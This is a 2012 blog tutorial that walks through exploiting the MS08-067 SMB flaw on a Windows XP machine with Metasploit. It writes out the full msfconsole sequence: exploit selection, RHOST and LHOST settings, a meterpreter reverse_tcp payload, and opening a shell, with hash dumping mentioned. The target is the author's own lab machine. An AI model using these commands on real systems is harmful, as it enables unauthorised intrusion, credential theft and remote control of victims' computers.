Selasa, 15 Mei 2012

Tutorial Metasploit

We all have seen the movies like hackers,etc we all have imagined to become the one like in movies.
So, taking a step forward to this dream i am giving a small tutorial on metasploit. I will be using a terminology msf instead of metaspoilt.
For those who dont know what is msf and have always been facinated by black and green screens, here is how it is done.

I am going to use NESSUS for vul. scanning and rest of the work will be done by msf. Also, I will be using msf console because it gives better control over the msf framework and faster response, using console has one more added advantage i.e.. it gives geeky look for which we all have a mind set that its very hi-fi.
Cutting all the discussions, directly coming to the topic.

So How to do it, I will describe this in steps for the better understanding, for this purpose i have used two system whom i have connected via WAN, host os doesnot matter, victim has xp installed on it.


Basic commands to be known:
1.searching anything: "search name"
2.set exploit: "use exploit_name" 
3.set payload:"set payload  payload_name"
4.see info: "info name"



STEP 1:
First instead of using nmap for port scanning , we have used nessus for the vul scanning, nessus has one more added advantage of giving each vul a number which helps in msf to search the proper exploit.
So, first we will scan the target.


In the above scan you can see how good nessus is in giving the information about the level of vulernability.
After analysing the report, we see 5 high vulnerability so clicking on the first one, lets see its details:


We can see lots of info about the vulnerability, vulnerability here service flaw at port 445 which has been given the number of MS08-067, this number is going to be of great help in future.


STEP2:
In msf, we are going to search for the proper exploit which can exploit it's vulnerability, so to make our search easier we are gonna type search number, wola see what we have got is the exact name of exploit, but for the other cases where you dont know the number or id , then also we can search by giving various parameters like name eg. search name etc...then we have to choose the best one among them by comparing all the requirnments and working.


Now , since  here we have got the exact exploit, then we are going to use this exploit,
 command used for it:
use exploit name eg. use windows/smb/ms08_067_netapi
we will check the various parameters by typing: info windows/smb/ms08_067_netapi


STEP3:
Now it's time to set victim's ip address i.e.. RHOST , RPORT is already set to 445


command to set RHOST: setg RHOST 192.168.1.5
Note:
(192.16.1.5 is the ip address of ma pc on local network whom i am going to attack)


STEP4:
After setting exploit, now its time to set the payload, so the main question arises which payload to use now??
Options for this questions can be shortened by typingshow payloads which gives the list of payloads which are compatible with that exploit.
In that we are going to select any payload , i prefer meterpreter/reverse_tcp.


To use this payload type the command: set payload windows/meterpreter/reverse_tcp


so , i will check it's paramater i.e.. LHOST, LPORT etc, now to check that , we type info windows/meterpreter/reverse_tcp




Now here we have to make some change LHOST, LHOST refers to the ip-address of attacker i.e.. mine.
So to set the LHOST we do :   setg LHOST 192.168.1.10




all done we are now ready  to exploit.


STEP 5:
Finally we type  exploit wola.... attack sucessful, session is created.


Now, what to do now?? Just type the command  help you will get a list of commands like kill process, shutdown,hash dumps, but i like shell because it gives you the full command line control of the system which you can see from the above picture.




Special Thanks: ICW,AH, guys and b0nd bro for their help in learning.




NOTE:
1.This tutorial is only for learning purpose, for any illegal use author is not responsible.
2.Any form of use of this tutorial should be done at own risk.

Tidak ada komentar:

Posting Komentar